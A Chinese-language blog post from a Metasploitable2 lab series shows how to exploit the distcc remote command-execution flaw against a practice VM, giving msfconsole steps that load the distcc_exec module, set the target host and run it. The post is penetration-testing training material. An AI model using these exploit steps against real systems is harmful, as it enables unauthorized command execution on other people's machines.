Metasploitable2靶机之第七篇--Distcc后门漏洞 约定不等于承诺〃 2022-10-22 01:40 235阅读 0赞 ### 文章目录 ### * * * 环境 * 原理 * 漏洞利用 * * * 第一步 ,启动metasploit * 第二步选择漏洞库 * 第三步 设置参数,开始攻击 * 第四步 利用成功,执行验证 * 摘抄 ### 环境 ### <table> <thead> <tr> <th>主机</th> <th>地址</th> </tr> </thead> <tbody> <tr> <td>Metasploitable2</td> <td>192.168.232.202</td> </tr> <tr> <td>kali-linux</td> <td>192.168.232.129</td> </tr> </tbody> </table> ### 原理 ### * Distcc用于大量代码在网络服务器上的分布式编译, * 但是如果配置不严格,容易被滥用执行命令, * 该漏洞是XCode 1.5版本及其他版本的distcc 2.x版本配置对于服务器端口的访问不限制 ### 漏洞利用 ### ##### 第一步 ,启动metasploit ##### msfconsole ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70] ##### 第二步选择漏洞库 ##### search search distcc_exec use exploit/unix/misc/distcc_exec ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 1] ##### 第三步 设置参数,开始攻击 ##### show options Set RHOST 192.168.232.202设置要攻击的IP exploit ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 2] ##### 第四步 利用成功,执行验证 ##### ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 3] ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 4] ### 摘抄 ### -------------------- 橘子不是唯一的水果, 就像世间没有唯一的答案。 – 珍妮特・温特森 《橘子不是唯一的水果》 -------------------- [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70]: /images/20221022/a6ab754db0294729a89681bdd8b1dc2f.png [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 1]: /images/20221022/dc5983605d0a4ab7b1a67e5f359922f8.png [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 2]: /images/20221022/011c2d8ded0c4f8f82a500535e69b538.png [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 3]: /images/20221022/040ccba0486641d4adb6e13fbfb0ffef.png [watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 4]: /images/20221022/fa562e922d2846f580316c30b85ccf70.png
相关 Metasploitable2靶机之第三篇--Tomcat管理台弱口令漏洞 文章目录 环境搭建 描述 影响版本 漏洞利用 第一步 矫情吗;*/ 2022年11月16日 01:44/ 0 赞/ 221 阅读
相关 Metasploitable2靶机之第二篇--ssh密码获取 文章目录 环境 主机ssh弱口令 第一步 查看SSh端口是否开启 第二步 ゝ一世哀愁。/ 2022年11月16日 01:44/ 0 赞/ 221 阅读
相关 Metasploitable2靶机之第一篇--弱口令漏洞 文章目录 环境准备 telnet 弱口令 MySQL弱口令 PostgreSQL (对 淡淡的烟草味﹌/ 2022年11月16日 01:42/ 0 赞/ 239 阅读
相关 Metasploitable2靶机之第十一篇--Druby远程代码执行漏洞 文章目录 环境 漏洞利用 第一步 ,启动MSF 第二步选择 太过爱你忘了你带给我的痛/ 2022年10月22日 02:46/ 0 赞/ 216 阅读
相关 Metasploitable2靶机之第十篇--PHP CGI参数注入执行漏洞(cve-2012-1823) 文章目录 环境 原理 影响版本 漏洞利用 第一步 , 傷城~/ 2022年10月22日 02:46/ 0 赞/ 305 阅读
相关 Metasploitable2靶机之第八篇--UnreallRCd后门漏洞 文章目录 环境 漏洞利用 第一步 启动metasploit 电玩女神/ 2022年10月22日 02:46/ 0 赞/ 244 阅读
相关 Metasploitable2靶机之第九篇--Java RMI SERVER 命令执行漏洞 文章目录 环境 原理 漏洞利用 第一步 ,查看1099端口是否开启 ゝ一纸荒年。/ 2022年10月22日 02:46/ 0 赞/ 291 阅读
相关 Metasploitable2靶机之第七篇--Distcc后门漏洞 文章目录 环境 原理 漏洞利用 第一步 ,启动metasploit 约定不等于承诺〃/ 2022年10月22日 01:40/ 0 赞/ 236 阅读
矫情吗;*
太过爱你忘了你带给我的痛
傷城~
小鱼儿
还没有评论,来说两句吧...